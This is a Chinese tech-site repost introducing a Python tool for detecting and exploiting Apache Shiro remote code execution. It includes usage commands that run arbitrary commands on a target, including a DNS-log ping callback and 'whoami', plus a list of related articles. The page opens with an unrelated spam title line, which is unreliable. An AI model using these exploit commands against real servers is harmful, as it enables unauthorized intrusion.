国产成AV人片久青草影院,中文字幕乱码无限2024

一個(gè)簡(jiǎn)單的Shiro RCE檢測(cè)和利用腳本

0x01 工具介紹

一個(gè)簡(jiǎn)單的Shiro RCE檢測(cè)和利用腳本。

0x02 安裝與使用

1、安裝需要的包

pip install -r requirements.txt

2、檢查該漏洞

python ShiroRceTool.py -m scan -u "http://example.com"

3、執(zhí)行命令 (不回顯)

python ShiroRceTool.py -m exploit -u "http://example.com" -c "ping dnslog.example.com"

4、執(zhí)行命令（嘗試回顯）

python ShiroRceTool.py -m exploit -u "http://example.com" -c "whoami" -e

5、獲取幫助 - Get help

python ShiroRceTool.py
 ____  _     _           ____         _____           _
/ ___|| |__ (_)_ __ ___ |  _  ___ __|_   _|__   ___ | |
\___ | '_ | | '__/ _ | |_) / __/ _ | |/ _  / _ | |
 ___) | | | | | | | (_) |  _ < (_|  __/| | (_) | (_) | |
|____/|_| |_|_|_|  \___/|_| _\___\___||_|\___/ \___/|_|


                        By: Hack3rHan


usage: ShiroRceTool.py [-h] [-m MODE] [-u URL] [-c CMD] [-e]


options:
  -h, --help            show this help message and exit
  -m MODE, --mode MODE  "exploit" or "scan".
  -u URL, --url URL     URL of the target.
  -c CMD, --cmd CMD     Command to execute.
  -e, --echo            Echo mode.

審核編輯：湯梓紅

聲明：本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人，不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用，如有內(nèi)容侵權(quán)或者其他違規(guī)問題，請(qǐng)聯(lián)系本站處理。舉報(bào)投訴

檢測(cè)

檢測(cè)

+關(guān)注

關(guān)注
5

文章
4488

瀏覽量
91478
命令

命令

+關(guān)注

關(guān)注
5

文章
684

瀏覽量
22027
腳本

腳本

+關(guān)注

關(guān)注
1

文章
389

瀏覽量
14866

原文標(biāo)題：一個(gè)簡(jiǎn)單的Shiro RCE檢測(cè)和利用腳本。

文章出處：【微信號(hào)：菜鳥學(xué)安全，微信公眾號(hào)：菜鳥學(xué)安全】歡迎添加關(guān)注！文章轉(zhuǎn)載請(qǐng)注明出處。

評(píng)論

相關(guān)推薦

工作中這種檢測(cè)腳本太常見了

寫一個(gè)檢測(cè)腳本，用來(lái)檢測(cè)本機(jī)所有磁盤分區(qū)讀寫是否都正常。

發(fā)表于 11-07 09:42 ?337次閱讀

Lua腳本簡(jiǎn)單介紹

Lua簡(jiǎn)單介紹Lua[1]是一個(gè)小巧的腳本語(yǔ)言。作者是巴西人。該語(yǔ)言的設(shè)計(jì)目的是為了嵌入應(yīng)用程序中，從而為應(yīng)用程序提供靈活的擴(kuò)展和定制功能。Lua腳

發(fā)表于 08-20 06:37

Lua腳本簡(jiǎn)單介紹

Lua簡(jiǎn)單介紹Lua[1]是一個(gè)小巧的腳本語(yǔ)言。作者是巴西人。該語(yǔ)言的設(shè)計(jì)目的是為了嵌入應(yīng)用程序中，從而為應(yīng)用程序提供靈活的擴(kuò)展和定制功能。Lua腳

發(fā)表于 08-20 08:06

基于DirectShow技術(shù)的RCE算法視頻加密方案

本文設(shè)計(jì)了一種利用DirectShow 技術(shù)結(jié)合一種新的RCE 算法實(shí)現(xiàn)視頻數(shù)據(jù)加密的方案。首先介紹了RCE 算法的加密解密過(guò)程和原理，然后

發(fā)表于 06-26 08:52 ?35次下載

shiro簡(jiǎn)單教程，環(huán)境搭建，權(quán)限控制，登陸驗(yàn)證

shiro簡(jiǎn)單教程，環(huán)境搭建，權(quán)限控制，登陸驗(yàn)證

發(fā)表于 09-09 08:18 ?9次下載

Apache Shiro框架的詳細(xì)資料說(shuō)明

對(duì)新的用戶機(jī)制并不熟悉，導(dǎo)致出現(xiàn)問題時(shí)耗費(fèi)了大量的時(shí)間來(lái)進(jìn)行修復(fù)。因此，我認(rèn)為我有必要編寫此文來(lái)介紹一下新的 Shiro 用戶機(jī)制。

發(fā)表于 03-08 08:00 ?4次下載

如何創(chuàng)建和執(zhí)行一個(gè)簡(jiǎn)單的Linux shell腳本

　如果您愿意要嘗試更長(zhǎng)的shell腳本，請(qǐng)將下面的shell腳本（并附加為PDF和ODT文件）復(fù)制到文本編輯器中，保存，使其可執(zhí)行并運(yùn)行。當(dāng)您了解更多Linux命令時(shí)，您可以創(chuàng)建更復(fù)雜的shell腳本。

發(fā)表于 11-06 17:28 ?1.3w次閱讀

如何巧妙利用HFSS腳本錄制功能

。摘要：在學(xué)個(gè)Antenna：HFSS腳本建模入門中，介紹了利用HFSS自帶的Record Script To File功能進(jìn)行腳本錄制。但是大部分情況下，工程師們只是希望錄制

發(fā)表于 07-29 11:15 ?3300次閱讀

109個(gè)實(shí)用shell腳本分享

Shell腳本,就是利用Shell的命令解釋的功能，對(duì)一個(gè)純文本的文件進(jìn)行解析，然后執(zhí)行這些功能，也可以說(shuō)Shell腳本就是

發(fā)表于 03-16 08:58 ?2633次閱讀

如何創(chuàng)建一個(gè)簡(jiǎn)單的腳本

Shell 腳本可以為您節(jié)省時(shí)間和精力，但是如果您不保護(hù)您的密碼，它們就會(huì)成為您的負(fù)擔(dān)。以下是如何保持安全的方法。

發(fā)表于 10-10 11:12 ?8480次閱讀

shiro綜合利用工具介紹

shiro綜合利用工具：ShiroExp ? 工具介紹 shiro一把梭工具，該輪子主要有三大功能如下: 1、默認(rèn)密鑰爆破利用Simple

發(fā)表于 10-24 11:14 ?5413次閱讀

利用Python寫了一個(gè)監(jiān)控服務(wù)器資源利用率的腳本！

研究了一個(gè)腳本，其主要目的是：基于 Python 編程語(yǔ)言來(lái)監(jiān)控服務(wù)器的 CPU、內(nèi)存、/目錄、/appslog、/bigdata目錄使用率以及網(wǎng)卡接收和發(fā)送情況。

發(fā)表于 01-29 15:08 ?728次閱讀

shiro如何實(shí)現(xiàn)Web應(yīng)用認(rèn)證

前面簡(jiǎn)單介紹了shiro這個(gè)框架的一些基本知識(shí)，包括其架構(gòu)模型，主要的功能，關(guān)鍵名稱的含義，以及核心模塊和對(duì)應(yīng)的接口定義。開始的話今天我們從一個(gè)

發(fā)表于 10-08 14:53 ?513次閱讀

Shiro功能介紹

記得做的第一個(gè)Web項(xiàng)目，系統(tǒng)認(rèn)證授權(quán)這塊就是基于Shiro實(shí)現(xiàn)的，當(dāng)時(shí)也是第一次接觸到這種類型的框架，同時(shí)是基于Spring做的集成，并且相關(guān)的配置都已經(jīng)是定制好的，只需要我們根據(jù)項(xiàng)目情況對(duì)極少

發(fā)表于 10-08 15:07 ?496次閱讀

編寫一個(gè)點(diǎn)名器腳本

目的：編寫一個(gè)腳本，可以將準(zhǔn)別好的名字合集的.txt傳入腳本，然后每次隨機(jī)顯示一個(gè)人的姓名

發(fā)表于 11-06 12:41 ?594次閱讀